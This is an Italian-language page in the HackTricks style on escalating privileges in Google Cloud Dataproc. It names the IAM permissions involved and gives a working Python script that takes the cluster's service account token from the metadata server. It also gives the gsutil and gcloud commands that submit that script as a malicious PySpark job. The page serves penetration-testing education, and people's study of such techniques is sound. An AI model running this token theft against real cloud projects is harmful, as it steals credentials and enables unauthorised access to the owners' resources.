# GCP Dataproc Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataproc

{{#ref}}
../gcp-services/gcp-dataproc-enum.md
{{#endref}}

### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`

Non sono riuscito a ottenere una reverse shell usando questo metodo; tuttavia è possibile leak del SA token dall'endpoint dei metadata usando il metodo descritto di seguito.

#### Passaggi per sfruttare

- Posiziona lo script del job nel bucket GCP

- Sottoponi un job a un cluster Dataproc.

- Usa il job per accedere al server dei metadata.

- Leak il service account token usato dal cluster.

<details><summary>Script Python per recuperare SA token dal server dei metadata</summary>
```python
import requests

metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
headers = {"Metadata-Flavor": "Google"}

def fetch_metadata_token():
try:
response = requests.get(metadata_url, headers=headers, timeout=5)
response.raise_for_status()
token = response.json().get("access_token", "")
print(f"Leaked Token: {token}")
return token
except Exception as e:
print(f"Error fetching metadata token: {e}")
return None

if __name__ == "__main__":
fetch_metadata_token()
```
</details>

<details><summary>Inviare un job malevolo a un cluster Dataproc</summary>
```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>

# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--cluster=<cluster-name> \
--region=<region>
```
</details>

{{#include ../../../banners/hacktricks-training.md}}
